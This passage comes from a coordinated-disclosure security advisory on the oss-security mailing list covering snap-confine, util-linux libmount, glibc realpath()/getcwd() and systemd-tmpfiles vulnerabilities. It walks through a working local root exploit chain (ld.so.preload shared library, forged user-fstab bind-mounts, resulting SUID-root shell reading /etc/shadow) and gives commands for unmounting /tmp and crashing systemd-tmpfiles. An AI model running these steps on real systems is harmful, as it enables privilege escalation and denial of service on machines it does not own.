> tmpfs now);
>
> 5/ it bind-mounts /var/lib/snapd/hostfs/var/lib/app-info onto
> /var/lib/app-info.
>
> Unfortunately, because we own /tmp inside snap-store's mount namespace
> (thanks to CVE-2021-44731), we can race against snap-update-ns between
> 1/ and 3/ and replace /tmp/.snap/var/lib -- and hence /var/lib -- with
> our own directory tree.
>
> Note: we can reliably win this race condition by "single-stepping"
> snap-confine (we execute it with SNAPD_DEBUG=1, we redirect its stderr
> to an AF_UNIX socket with minimized SO_RCVBUF and SO_SNDBUF, we read()
> its output byte by byte, and we MSG_PEEK at its buffered output).
>
> This race condition allows us to replace
> /var/lib/snapd/mount/snap.snap-store.user-fstab with our own fstab file,
> which allows us to set up near-arbitrary bind-mounts inside snap-store's
> mount namespace. These bind-mounts are not completely arbitrary, because
> they are restricted by the "snap-update-ns.snap-store" AppArmor profile,
> whose most interesting rules are:
>
> ------------------------------------------------------------------------
>  170   mount options=(rbind, rw) /tmp/.snap/*/ -> /*/,
>  ...
>  762   mount options=(rbind, rw) /tmp/.snap/var/lib/*/ -> /var/lib/*/,
> ------------------------------------------------------------------------
>
> Our action plan, then, is:
>
> - we create a copy of /etc (minus the unreadable files like /etc/shadow)
>  into /tmp/.tmp/.snap/etc (which will become /tmp/.snap/etc inside
>  snap-store's mount namespace);
>
> - we create a file /tmp/.tmp/.snap/etc/ld.so.preload (which contains the
>  library name "/tmp/librootshell.so"), and we create a shared library
>  /tmp/.tmp/librootshell.so (which will become /tmp/librootshell.so
>  inside snap-store's mount namespace);
>
> - we bind-mount our /tmp/.tmp onto /tmp (inside snap-store's mount
>  namespace) by exploiting CVE-2021-44731 (note: /tmp/snap.snap-store
>  does not normally exist, but if it does, we can use our "@reboot"
>  crontab trick to create it ourselves on the next reboot);
>
> - we bind-mount the contents of /tmp/.tmp/.snap/var/lib into /var/lib
>  (inside snap-store's mount namespace) by exploiting the race condition
>  between 1/ and 3/ in snap-update-ns;
>
> - we add the following bind-mount line to our
>  /tmp/.tmp/.snap/var/lib/snapd/mount/snap.snap-store.user-fstab (which
>  is effectively /var/lib/snapd/mount/snap.snap-store.user-fstab inside
>  snap-store's mount namespace):
>
>  /tmp/.snap/etc /etc none rbind,rw 0 0
>
> - we execute snap-confine (outside snap-store's mount namespace), which
>  reads our user-fstab file and bind-mounts our copy of /etc (inside
>  snap-store's mount namespace) -- this bind-mount is allowed by the
>  line 170 of the "snap-update-ns.snap-store" AppArmor profile;
>
> - we execute the SUID-root program /usr/lib/snapd/snap-confine (inside
>  snap-store's mount namespace), which reads our /etc/ld.so.preload and
>  therefore executes our shared library /tmp/librootshell.so, as root --
>  these two operations are allowed by the "snap.snap-store.snap-store"
>  AppArmor profile:
>
> ------------------------------------------------------------------------
>  34   /etc/ld.so.preload r,
>  ...
>  299   /tmp/** mrwlkix,
> ------------------------------------------------------------------------
>
> ________________________________________________________________________
>
> First, failed attempt
> ________________________________________________________________________
>
> Our first attempt succeeded in bind-mounting our own /etc but failed to
> execute a SUID-root program inside snap-store's mount namespace. Indeed,
> snap-confine's defensive programming detected that /var/lib/snapd does
> not belong to root (it belongs to us, inside snap-store's mount
> namespace), and called exit() (via validate_bpfpath_is_safe()):
>
> ------------------------------------------------------------------------
> $ id
> uid=1001(jane) gid=1001(jane) groups=1001(jane)
>
> $ gcc -o CVE-2021-44731-Desktop CVE-2021-44731-Desktop.c
> $ ./CVE-2021-44731-Desktop
> ...
> change.go:316: DEBUG: mount name:"/tmp/.snap/var/lib/snapd" dir:"/var/lib/snapd" type:"" opts:MS_BIND|MS_REC unparsed:"" (error: <nil>)
> ...
>
> $ cp -a /etc /tmp/.tmp/.snap
> $ echo /tmp/librootshell.so > /tmp/.tmp/.snap/etc/ld.so.preload
> $ gcc -fpic -shared -o /tmp/.tmp/librootshell.so librootshell.c
> $ mkdir /tmp/.tmp/.snap/var/lib/snapd/mount
> $ echo '/tmp/.snap/etc /etc none rbind,rw 0 0' > /tmp/.tmp/.snap/var/lib/snapd/mount/snap.snap-store.user-fstab
>
> $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=snap-store /usr/lib/snapd/snap-confine --base core18 snap.snap-store.snap-store /usr/lib/snapd/snap-confine
> ...
> change.go:316: DEBUG: mount name:"/tmp/.snap/etc" dir:"/etc" type:"none" opts:MS_BIND|MS_REC unparsed:"" (error: <nil>)
> ...
> DEBUG: loading bpf program for security tag snap.snap-store.snap-store
> /var/lib/snapd not root-owned 1001:1001
> ------------------------------------------------------------------------
>
> ________________________________________________________________________
>
> Second, successful attempt
> ________________________________________________________________________
>
> The solution to this problem is easy; because the original, root-owned
> bind-mount of /var/lib still exists inside snap-store's mount namespace
> (we merely renamed it, during the race condition between 1/ and 3/), we
> can simply rename it back to /tmp/.snap/var/lib, and add the following
> bind-mount line to our user-fstab file:
>
>  /tmp/.snap/var/lib/snapd /var/lib/snapd none rbind,rw 0 0
>
> This bind-mount is allowed by the line 762 of the
> "snap-update-ns.snap-store" AppArmor profile, and allows us to change
> the ownership of /var/lib/snapd back to root, and to execute a SUID-root
> program inside snap-store's mount namespace (and hence our own shared
> library, as root):
>
> ------------------------------------------------------------------------
> $ echo '/tmp/.snap/var/lib/snapd /var/lib/snapd none rbind,rw 0 0' >> /tmp/.tmp/.snap/var/lib/snapd/mount/snap.snap-store.user-fstab
> $ mv -i /tmp/.tmp/.snap/var/lib /tmp/.tmp/.snap/var/lib.exchange2
> $ mv -i /tmp/.tmp/.snap/var/lib.exchange /tmp/.tmp/.snap/var/lib
>
> $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=snap-store /usr/lib/snapd/snap-confine --base core18 snap.snap-store.snap-store /usr/lib/snapd/snap-confine
> ...
> change.go:316: DEBUG: mount name:"/tmp/.snap/etc" dir:"/etc" type:"none" opts:MS_BIND|MS_REC unparsed:"" (error: <nil>)
> change.go:316: DEBUG: mount name:"/tmp/.snap/var/lib/snapd" dir:"/var/lib/snapd" type:"none" opts:MS_BIND|MS_REC unparsed:"" (error: <nil>)
> ...
> DEBUG: loading bpf program for security tag snap.snap-store.snap-store
> DEBUG: read 6392 bytes from /var/lib/snapd/seccomp/bpf//snap.snap-store.snap-store.bin
> ...
> DEBUG: execv(/usr/lib/snapd/snap-confine, /usr/lib/snapd/snap-confine...)
> ...
> ------------------------------------------------------------------------
>
> This second attempt succeeded; our shared library created a SUID-root
> shell /tmp/sh that is reachable outside snap-store's mount namespace via
> /tmp/.tmp/sh:
>
> ------------------------------------------------------------------------
> $ /tmp/.tmp/sh -p
> # id
> uid=1001(jane) gid=1001(jane) euid=0(root) groups=1001(jane)
>  ^^^^^^^^^^^^
> # wc /etc/shadow
>  49   49 1617 /etc/shadow
> ------------------------------------------------------------------------
>
>
>
> ========================================================================
> Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount
> ========================================================================
>
>  Get a little extra help
>  -- Oh No! More Lemmings, Tame Level 14
>
> During our work on snap-confine, we explored many different avenues of
> attack; most of them were dead ends, but some of them led us to the
> discovery of vulnerabilities in related packages and libraries. For
> example, we pondered over the beginning of snap-confine's function
> sc_bootstrap_mount_namespace() for a long time:
>
> ------------------------------------------------------------------------
> 223         char scratch_dir[] = "/tmp/snap.rootfs_XXXXXX";
> ...
> 226         if (mkdtemp(scratch_dir) == NULL) {
> ...
> 234         sc_do_mount("none", "/", NULL, MS_REC | MS_SHARED, NULL);
> ...
> 238         sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL);
> ...
> 245         sc_do_mount("none", scratch_dir, NULL, MS_UNBINDABLE, NULL);
> ...
> 254         sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND,
> 255                     NULL);
> ------------------------------------------------------------------------
>
> This function is called after unshare(CLONE_NEWNS) to set up the root
> filesystem inside a snap's mount namespace:
>
> - at lines 223-226, it creates a random, temporary scratch directory
>  /tmp/snap.rootfs_XXXXXX (as root, with permissions 0700) that will
>  become the snap's root filesystem;
>
> - at lines 238-245, it bind-mounts this scratch directory onto itself,
>  and makes it unbindable and private (i.e., subsequent mounts inside
>  this directory will not be visible outside the snap's mount
>  namespace);
>
> - at lines 254-255, it bind-mounts the snap's root filesystem onto this
>  scratch directory (for example, /snap/snapd/current, a read-only
>  squashfs that contains a copy of the SUID-root snap-confine).
>
> Our half-baked idea was: what if we were able to unmount the scratch
> directory's private bind-mount, after line 245 but before line 254? The
> bind-mount of the snap's root filesystem (at lines 254-255) would not be
> private anymore, and would therefore be visible outside the snap's mount
> namespace. In other words, we would be able to execute snap-confine via
> /tmp/snap.rootfs_XXXXXX/usr/lib/snapd/snap-confine, which reminded us
> strongly of our exploit for CVE-2021-44730 (but without a hardlink).
>
> Consequently, we audited the SUID-root programs umount and fusermount
> for ways to unmount a filesystem that does not belong to us, and we
> discovered CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount
> (which is used internally by umount).
>
> Note: CVE-2021-3996 and CVE-2021-3995 were both introduced by commit
> 5fea669 ("libmount: Support unmount FUSE mounts") in November 2018.
>
>
>
> ========================================================================
> CVE-2021-3996: Unauthorized unmount in util-linux's libmount
> ========================================================================
>
> In order for an unprivileged user to unmount a FUSE filesystem with
> umount, this filesystem must a/ be listed in /proc/self/mountinfo, and
> b/ be a FUSE filesystem (lines 466-470), and c/ belong to the current,
> unprivileged user (lines 477-498):
>
> ------------------------------------------------------------------------
>  451 static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
>  452 {
>  ...
>  466         if (strcmp(type, "fuse") != 0 &&
>  467             strcmp(type, "fuseblk") != 0 &&
>  468             strncmp(type, "fuse.", 5) != 0 &&
>  469             strncmp(type, "fuseblk.", 8) != 0)
>  470                 return 0;
>  ...
>  477         if (mnt_optstr_get_option(optstr, "user_id", &user_id, &sz) != 0)
>  478                 return 0;
>  ...
>  490         uid = getuid();
>  ...
>  497         snprintf(uidstr, sizeof(uidstr), "%lu", (unsigned long) uid);
>  498         return strncmp(user_id, uidstr, sz) == 0;
>  499 }
> ------------------------------------------------------------------------
>
> Unfortunately, when parsing /proc/self/mountinfo, the libmount blindly
> removes any " (deleted)" suffix from the mountpoint pathnames (at lines
> 231-233):
>
> ------------------------------------------------------------------------
>  17 #define PATH_DELETED_SUFFIX     " (deleted)"
> ------------------------------------------------------------------------
>  179 static int mnt_parse_mountinfo_line(struct libmnt_fs *fs, const char *s)
>  180 {
>  ...
>  223         /* (5) target */
>  224         fs->target = unmangle(s, &s);
>  ...
>  231         p = (char *) endswith(fs->target, PATH_DELETED_SUFFIX);
>  232         if (p && *p)
>  233                 *p = '\0';
> ------------------------------------------------------------------------
>
> This vulnerability allows an unprivileged user to unmount other users'
> filesystems that are either world-writable themselves (like /tmp) or
> mounted in a world-writable directory (like /tmp/snap.rootfs_XXXXXX).
> For example, on Fedora, /tmp is a tmpfs, so we can mount a basic FUSE
> filesystem named "/tmp/ (deleted)" (with FUSE's "hello world" program,
> ./hello) and unmount /tmp itself (a denial of service):
>
> ------------------------------------------------------------------------
> $ id
> uid=1000(john) gid=1000(john) groups=1000(john) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
>
> $ grep /tmp /proc/self/mountinfo
> 84 87 0:34 / /tmp rw,nosuid,nodev shared:38 - tmpfs tmpfs rw,seclabel,size=2004304k,nr_inodes=409600,inode64
>
> $ mkdir -m 0700 /tmp/" (deleted)"
> $ ./hello /tmp/" (deleted)"
>
> $ grep /tmp /proc/self/mountinfo
> 84 87 0:34 / /tmp rw,nosuid,nodev shared:38 - tmpfs tmpfs rw,seclabel,size=2004304k,nr_inodes=409600,inode64
> 620 84 0:46 / /tmp/\040(deleted) rw,nosuid,nodev,relatime shared:348 - fuse.hello hello rw,user_id=1000,group_id=1000
>
> $ mount | grep /tmp
> tmpfs on /tmp type tmpfs (rw,nosuid,nodev,seclabel,size=2004304k,nr_inodes=409600,inode64)
> /home/john/hello on /tmp/ type fuse.hello (rw,nosuid,nodev,relatime,user_id=1000,group_id=1000)
>
> $ umount -l /tmp/
> $ grep /tmp /proc/self/mountinfo | wc
>  0       0       0
> ------------------------------------------------------------------------
>
>
>
> ========================================================================
> CVE-2021-3995: Unauthorized unmount in util-linux's libmount
> ========================================================================
>
> Alert readers may have spotted another vulnerability in
> is_fuse_usermount(): at line 498, only the first "sz" characters of the
> current user's uid are compared to the filesystem's "user_id" option (sz
> is user_id's length). This second vulnerability allows an unprivileged
> user to unmount the FUSE filesystems that belong to certain other users;
> for example, if our own uid is 1000, then we can unmount the FUSE
> filesystems of the users whose uid is 100, 10, or 1:
>
> ------------------------------------------------------------------------
> $ id
> uid=1000(john) gid=1000(john) groups=1000(john) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
>
> $ grep fuse /proc/self/mountinfo
> 38 23 0:32 / /sys/fs/fuse/connections rw,nosuid,nodev,noexec,relatime shared:18 - fusectl fusectl rw
> 620 87 0:46 / /mnt/bin rw,nosuid,nodev,relatime shared:348 - fuse.hello hello rw,user_id=1,group_id=1
>
> $ umount -l /mnt/bin
> $ grep fuse /proc/self/mountinfo
> 38 23 0:32 / /sys/fs/fuse/connections rw,nosuid,nodev,noexec,relatime shared:18 - fusectl fusectl rw
> ------------------------------------------------------------------------
>
>
>
> ========================================================================
> Epilogue: snap-confine and CVE-2021-3996 in util-linux's libmount
> ========================================================================
>
> CVE-2021-3996 in libmount allows us to unmount the private bind-mount
> of snap-confine's scratch directory, between the lines 245 and 254 (we
> can reliably win this race condition by "single-stepping" snap-confine
> with SNAPD_DEBUG=1), which allows us to execute the bind-mounted program
> /tmp/snap.rootfs_XXXXXX/usr/lib/snapd/snap-confine. Nonetheless, we were
> unable to reproduce our exploit for CVE-2021-44730 or CVE-2021-44731:
>
> - if we execute snap-confine outside the snap's mount namespace, via
>  /tmp/snap.rootfs_XXXXXX/usr/lib/snapd/snap-confine, then we are unable
>  to provide our own snap-discard-ns program because the directory
>  /tmp/snap.rootfs_XXXXXX already exists and we cannot remove it;
>
> - if we execute snap-confine inside the snap's mount namespace, via
>  /var/lib/snapd/hostfs/tmp/snap.rootfs_XXXXXX/usr/lib/snapd/snap-confine,
>  then snap-confine enters init's mount namespace (outside the snap's
>  mount namespace) and we are unable to provide our own snap-discard-ns
>  program because the directory /var/lib/snapd/hostfs/tmp does not exist
>  and we cannot create it.
>
> If you, dear reader, find a solution to these problems, please post it
> to the public oss-security mailing list!
>
> Note: CVE-2021-3996 might be exploitable in contexts other than
> snap-confine, but we have not explored this possibility.
>
>
>
> ========================================================================
> CVE-2021-3998: Unexpected return value from glibc's realpath()
> ========================================================================
>
>  Triple Trouble
>  -- Lemmings, Taxing Level 26
>
> While auditing umount and fusermount, we also discovered a vulnerability
> in the glibc's realpath() function, which is used internally by various
> programs. Normally, when the output buffer "resolved" that is passed to
> realpath() is not NULL, then realpath() either returns NULL on failure,
> or it returns the output buffer "resolved" on success. Unfortunately,
> since commit c6e0b0b ("stdlib: Sync canonicalize with gnulib") from
> January 2021, realpath() can mistakenly return a malloc()ated buffer
> that is neither NULL nor the output buffer "resolved":
>
> ------------------------------------------------------------------------
> 430 char *
> 431 __realpath (const char *name, char *resolved)
> 432 {
> ...
> 437   struct scratch_buffer rname_buffer;
> 438   return realpath_stk (name, resolved, &rname_buffer);
> 439 }
> ------------------------------------------------------------------------
> 197 static char *
> 198 realpath_stk (const char *name, char *resolved,
> 199               struct scratch_buffer *rname_buf)
> 200 {
> ...
> 399   failed = false;
> ...
> 403   if (resolved != NULL && dest - rname <= get_path_max ())
> 404     rname = strcpy (resolved, rname);
> ...
> 410   if (failed || rname == resolved)
> 411     {
> 412       scratch_buffer_free (rname_buf);
> 413       return failed ? NULL : resolved;
> 414     }
> 415 
> 416   return scratch_buffer_dupfree (rname_buf, dest - rname);
> 417 }
> ------------------------------------------------------------------------
>
> For example, if the input path "name" is "." and if the current working
> directory is longer than PATH_MAX, then:
>
> - at line 399, "failed" is set to false;
>
> - at lines 403-404, "rname" is NOT set to "resolved" and "resolved" is
>  left untouched and uninitialized (because "dest - rname" is longer
>  than PATH_MAX);
>
> - the code block at lines 410-414 is skipped (because "failed" is false
>  and "rname" is not "resolved");
>
> - at line 416, scratch_buffer_dupfree() returns a malloc()ated buffer
>  that is NOT the output buffer "resolved".
>
> The consequences of this vulnerability depend on the affected programs;
> for example, fusermount (a SUID-root program) can disclose sensitive
> information (pointers) when displaying the contents of a stack-based
> buffer that is mistakenly left uninitialized by realpath() (we tested
> this proof of concept on Ubuntu 21.04):
>
> ------------------------------------------------------------------------
> $ gcc -o CVE-2021-3998-fusermount CVE-2021-3998-fusermount.c
> $ ./CVE-2021-3998-fusermount > CVE-2021-3998-fusermount.output
> ...
>
> $ hexdump -C CVE-2021-3998-fusermount.output
> 00000000  2f 75 73 72 2f 62 69 6e  2f 66 75 73 65 72 6d 6f  |/usr/bin/fusermo|
> 00000010  75 6e 74 3a 20 65 6e 74  72 79 20 66 6f 72 20 f0  |unt: entry for .|
> 00000020  83 9b 99 ff 7f 20 6e 6f  74 20 66 6f 75 6e 64 20  |..... not found |
> 00000030  69 6e 20 2f 65 74 63 2f  6d 74 61 62 0a 0a 2f 75  |in /etc/mtab../u|
> 00000040  73 72 2f 62 69 6e 2f 66  75 73 65 72 6d 6f 75 6e  |sr/bin/fusermoun|
> 00000050  74 3a 20 65 6e 74 72 79  20 66 6f 72 20 39 ac b7  |t: entry for 9..|
> 00000060  a5 a2 7f 20 6e 6f 74 20  66 6f 75 6e 64 20 69 6e  |... not found in|
> 00000070  20 2f 65 74 63 2f 6d 74  61 62 0a 0a              | /etc/mtab..|
> ------------------------------------------------------------------------
>
>
>
> ========================================================================
> CVE-2021-3999: Off-by-one buffer overflow/underflow in glibc's getcwd()
> ========================================================================
>
>  Down, along, up. In that order
>  -- Lemmings, Mayhem Level 5
>
> While studying the vulnerability in realpath(), we also discovered a
> vulnerability in the glibc's getcwd() function (which is used internally
> by realpath() to resolve relative pathnames) -- an off-by-one buffer
> overflow and underflow, but if and only if the "size" of "buf" is
> exactly 1:
>
> ------------------------------------------------------------------------
>  48 __getcwd (char *buf, size_t size)
>  49 {
>  ..
>  54   size_t alloc_size = size;
>  ..
>  76     path = buf;
>  ..
>  80   retval = INLINE_SYSCALL (getcwd, 2, path, alloc_size);
> ...
> 100   if (retval >= 0 || errno == ENAMETOOLONG)
> 101     {
> ...
> 110       result = __getcwd_generic (path, size);
> ------------------------------------------------------------------------
> 158 __getcwd_generic (char *buf, size_t size)
> 159 {
> ...
> 187   size_t allocated = size;
> ...
> 247     dir = buf;
> 248 
> 249   dirp = dir + allocated;
> 250   *--dirp = '\0';
> ...
> 262   while (!(thisdev == rootdev && thisino == rootino))
> 263     {
> ...
> 441     }
> ...
> 449   if (dirp == &dir[allocated - 1])
> 450     *--dirp = '/';
> ...
> 457   used = dir + allocated - dirp;
> 458   memmove (dir, dirp, used);
> ------------------------------------------------------------------------
>
> If, at line 48, the "size" of "buf" is exactly 1:
>
> - and if, at line 80, the kernel's getcwd() syscall fails with the error
>  ENAMETOOLONG (because the current working directory is longer than
>  PATH_MAX),
>
> - then, at line 110, a generic implementation of getcwd() is called;
>
> - at line 250, a null byte is written to "dirp", which points exactly to
>  "buf" (because "size", and hence "allocated", are exactly 1);
>
> - if the code block at lines 262-441 is skipped entirely (if the current
>  working directory corresponds to the "/" directory),
>
> - then, at lines 449-450, a slash is written to "buf-1" (an off-by-one
>  buffer underflow, because at line 449 "dirp" was still pointing
>  exactly to "buf"),
>
> - and, at lines 457-458, a null byte is written to "buf+1" (an
>  off-by-one buffer overflow, because at line 457 "used" is exactly 2).
>
> It may seem impossible to satisfy the condition at line 100 (the current
> working directory is longer than PATH_MAX) and the condition at line 262
> (the current working directory corresponds to the "/" directory), but in
> reality we can:
>
> - in a child process:
>
>  - create an unprivileged mount namespace;
>
>  - create a directory longer than PATH_MAX;
>
>  - bind-mount "/" onto this directory;
>
>  - open() this directory and send its file descriptor to the parent
>  process (outside the unprivileged mount namespace);
>
> - in the parent process:
>
>  - receive the file descriptor of this directory (which corresponds to
>  "/" and is longer than PATH_MAX) and fchdir() to it;
>
>  - execute a SUID program that calls getcwd() with a buffer of size 1,
>  which triggers the off-by-one buffer overflow and underflow.
>
> Apparently, this vulnerability was introduced in February 1995 by the
> very first commit in the glibc's git history (28f540f, "initial import")
> and could be triggered without an unprivileged mount namespace, by
> simply chdir()ing to the "/" directory:
>
> ------------------------------------------------------------------------
> 190 getcwd (buf, size)
> ...
> 218     path = buf;
> ...
> 226   pathp = path + size;
> 227   *--pathp = '\0';
> ...
> 242   while (!(thisdev == rootdev && thisino == rootino))
> 243     {
> ...
> 351     }
> 352 
> 353   if (pathp == &path[size - 1])
> 354     *--pathp = '/';
> ...
> 359   memmove (path, pathp, path + size - pathp);
> ------------------------------------------------------------------------
>
> Although "the size of buf is exactly 1" is a strong requirement,
> vulnerable code like the following may exist in the wild:
>
> ------------------------------------------------------------------------
> #include <unistd.h>
> #include <stdio.h>
>
> int main(int argc, char * argv[]) {
>  char buf[4096];
>  int len = snprintf(buf, sizeof(buf), "%s: cwd is ", argv[0]);
>  if (len <= 0 || (unsigned)len >= sizeof(buf)) return __LINE__;
>  if (!getcwd(buf + len, sizeof(buf) - len)) return __LINE__;
>  puts(buf);
>  return 0;
> }
> ------------------------------------------------------------------------
>
>
>
> ========================================================================
> CVE-2021-3997: Uncontrolled recursion in systemd's systemd-tmpfiles
> ========================================================================
>
>  The Stack
>  -- Oh No! More Lemmings, Crazy Level 6
>
> While trying to exploit snap-confine via CVE-2021-3996, we explored
> alternative ways to remove the scratch directory /tmp/snap.rootfs_XXXXXX
> (a sufficient, and maybe necessary, condition for a successful exploit).
> We therefore looked into systemd-tmpfiles (which "creates, deletes, and
> cleans up volatile and temporary files and directories") and discovered
> a denial of service (an uncontrolled recursion): if we create thousands
> of nested directories in /tmp, then "systemd-tmpfiles --remove" (when
> executed as root at boot time) will call its rm_rf_children() function
> recursively (on each nested directory) and will exhaust its stack and
> crash. For example, on Ubuntu 21.04:
>
> ------------------------------------------------------------------------
> $ cd /tmp
> $ perl -e 'use strict;
> for (my $i = 0; $i < (1<<15); $i++) {
> mkdir "A", 0700 or die;
> chdir "A" or die; }'
> ------------------------------------------------------------------------
>
> Then, as root (warning: this command may delete important files and
> directories in /tmp; it is normally executed at boot time only):
>
> ------------------------------------------------------------------------
> # systemd-tmpfiles --remove
> Segmentation fault (core dumped)
> ------------------------------------------------------------------------
>
> We have not fully explored the implications of this vulnerability;
> however, we noticed that:
>
> - at boot time, systemd executes "systemd-tmpfiles --create --remove
>  --boot --exclude-prefix=/dev";
>
> - systemd-tmpfiles first enters the "remove" phase, and subsequently
>  enters the "create" phase;
>
> - but if systemd-tmpfiles crashes during the "remove" phase, then it
>  never enters the "create" phase;
>
> - and it fails to create the files and directories (specified in
>  /usr/lib/tmpfiles.d/*.conf) that it should create at boot time;
>
> - for example, on Ubuntu 21.04, systemd-tmpfiles fails to create the
>  directory /run/lock/subsys; but because /run/lock is world-writable,
>  attackers can create their own /run/lock/subsys; and because various
>  legacy packages and daemons write into /run/lock/subsys as root, the
>  attackers may create arbitrary files via symlinks in /run/lock/subsys.
>
> Last-minute note: it seems impossible to trigger this vulnerability in
> systemd-tmpfiles versions before commit e535840 ("tmpfiles: let's bump
> RLIMIT_NOFILE for tmpfiles") from February 2019.
>
>
>
> ========================================================================
> Acknowledgments
> ========================================================================
>
> We thank the Ubuntu Security Team (Alex Murray and Seth Arnold in
> particular) for their hard work on the snap-confine vulnerabilities. We
> also thank Red Hat Product Security, Zbigniew Jedrzejewski-Szmek, Karel
> Zak, Siddhesh Poyarekar, and the members of linux-distros@...nwall for
> their work on the systemd, util-linux, and glibc vulnerabilities.
>
> This advisory is dedicated to 8lgm -- followers of symbolic links,
> overflowers of stack buffers, and dereferencers of NULL pointers:
>
> https://attrition.org/security/advisory/8lgm/
> https://web.archive.org/web/20081203221844/packetstorm.linuxsecurity.com/poisonpen/8lgm/ptchown.c
>
>
>
> ========================================================================
> Timeline
> ========================================================================
>
> 2021-10-27: We sent our advisory and proofs-of-concepts to
> security@...ntu.
>
> 2021-11-10: We sent our advisory and proofs-of-concepts (without the
> snap-confine vulnerabilities) to secalert@...hat.
>
> 2021-12-29: We sent a write-up and the patch for the systemd
> vulnerability to linux-distros@...nwall.
>
> 2022-01-10: We published our write-up on the systemd vulnerability
> (https://www.openwall.com/lists/oss-security/2022/01/10/2).
>
> 2022-01-12: Red Hat filed the glibc vulnerabilities upstream
> (https://sourceware.org/bugzilla/show_bug.cgi?id=28769 and
> https://sourceware.org/bugzilla/show_bug.cgi?id=28770).
>
> 2022-01-20: We sent a write-up and the patches for the util-linux
> vulnerabilities to linux-distros@...nwall.
>
> 2022-01-24: We published our write-up on the util-linux vulnerabilities
> (https://www.openwall.com/lists/oss-security/2022/01/24/2).
>
> 2022-01-24: We published our write-up on the glibc vulnerabilities
> (https://www.openwall.com/lists/oss-security/2022/01/24/4).
>
> 2022-02-03: We sent our advisory and Ubuntu sent their patches for the
> snap-confine vulnerabilities to linux-distros@...nwall.
>
> 2022-02-17: Coordinated Release Date (5:00 PM UTC) for the snap-confine
> vulnerabilities.
>
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.